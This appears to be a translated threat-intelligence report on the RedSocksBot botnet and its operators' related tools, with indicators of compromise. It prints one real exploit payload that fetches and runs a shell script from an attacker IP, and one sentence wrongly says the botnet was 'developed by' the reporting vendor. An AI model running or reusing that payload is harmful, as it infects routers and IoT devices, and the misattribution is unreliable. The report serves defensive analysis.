返回 TI 主页

1.Overview

In early April 2023, QiAnXin Threat Intelligence Center's threat monitoring system detected an incident of unknown family malware samples utilizing the RealTek CVE-2021-35394 vulnerability to spread. After analysis, this series of samples belonged to the same group of RedGoBot, which we have previously disclosed. Through correlation analysis, we confirmed that the group has recently begun to attempt to hide communication with C2 through socks proxy, while turning to use Tor CC.

In this article, in addition to the newly discovered zombie network samples, we will also sort out other botnets that the group has recently operated.


2. Key Behavior Analysis of Samples

The sample spreads through Realtek Jungle SDK RCE, with the following payload:

orf;cd /tmp; rm \-rf bins\.sh; wget http:*//194\.87\.197\.176/bins/bins\.sh; chmod \+x bins\.sh; sh bins\.sh; \#*

Based on the characteristics of the sample and the attribution of the group, we named this zombie network RedSocksBot. The latest binary samples supported CPU architectures as follows:

  • x86-64
  • PPC
  • MIPS
  • ARM
  • SPC
  • 68K
  • SuperH

2.1 Killing Other Zombie Networks

Search for other processes that may be zombie networks through the Linux virtual file system for killing:

In addition, it will also search for possible Downloaders for killing:


2.2 Hiding Communication with C2 through a Proxy

Using the socks5 protocol for communication, the sample has a built-in proxy address. The following is the proxy address used in the latest version:

Using a socks5 proxy with no password authentication:

Then, RedSocksBot communicates with the hardcoded C2 through the proxy in encrypted form. The data decryption method is cyclic XOR:

In the latest version, the hardcoded C2 of RedSocksBot has changed to a dark web address:


2.3 DDoS Methods

The latest version of RedSocksBot, developed by QiAnXin, supports six DDoS attack methods, as follows:

-
udp_bypass
openvpn
openvpn2
tcp_stomp
tcp_syn
tcp_ack

3. Arsenal

3.1 mirai_redbot

The group has achieved mastery in utilizing the open-source Mirai botnet. During the analysis process, analysts found that the group possessed multiple modified versions of Mirai, in addition to the usual operations of modifying keys and online packages. One of the modified versions uses AES decryption and incorporates a socks proxy in its iteration, which we have named mirai_redbot.

Its main feature is the use of the tiny-AES-c open-source and portable project from GitHub to replace the XOR decryption algorithm with an AES decryption algorithm.

Traditional Mirai uses the XOR algorithm for decryption:

Mirai_redbot uses tiny-AES-c from GitHub:

The group also modified the online package, as exemplified in one of the versions below:

In subsequent versions, the developer added a socks proxy feature:

During the update process, the C2 was also modified to a dark web address:


3.2 Quasar RAT

In addition to deploying zombie networks on Linux systems, the group has also been found to have distributed a backdoor program on Windows systems. The backdoor program is a C# program that has been obfuscated, and after analysis, was confirmed to be the Quasar RAT.

This suggests that the group is involved in other illicit activities beyond zombie networks.


3.3 RedGoBot

Furthermore, we found that the group is continuously updating RedGoBot, with the new version using GO version 1.19.

The new version slightly modified the directory for killing processes, changing "/var/run/" to "/var".

The group also reduced the number of weak password combinations for telnet brute force attacks from 64 to 2, possibly to avoid detection or being blocked by reducing the failure rate of sample brute force attacks:

A bot update command was added, but it has not been implemented yet:


4. Conclusion

Through analysis of the group's arsenal and recent update trends, it is evident that the group intends to incorporate socks proxies into their bot updates and gradually shift their CC domain names to onion domains to reduce the chances of detection. In addition to zombie networks, the group is also involved in other illicit activities. We will continue to monitor this group.


5. IOCs

RedSocksBot:

MD5:

EC866BF75A575580672C4D119986562A

E9AABD9B63DA5295ABE7623DE1653D8D

49890121A8154D1EFA0472ED72696AE2

1D3F6F716C74B1810936CD6442295AC6

C2:

158.247.223.97:443

141.164.45.139:443

139.162.76.15:443

vs2bfkss7uyv2vtvsuyxc23za327zcufannp4twbirvupap2fahifwyd.onion

mirai_redbot:

MD5:

4c51359ac1c7422083f7799eace7f8e6

C2:

broilerchickensrs.boats

gxgvoh5yljp2v2hvyiztzjhhuveaygcejp54y5gts2dnntdjexrkm2ad.onion

RedGoBot:

MD5:

9e44f040eba9b582b532fd952c7c8fd6

39a70e21e46c846b5d604ad1ef7178c0

C2:

cat-gen.cf

bot.ustress.app

62.77.157.220:6001

Quasar RAT:

MD5:

14aeb4447d6ad9d7efca5e88854261e7

C2:

mictobozo.duckdns.org

REDGOBOT BOTNET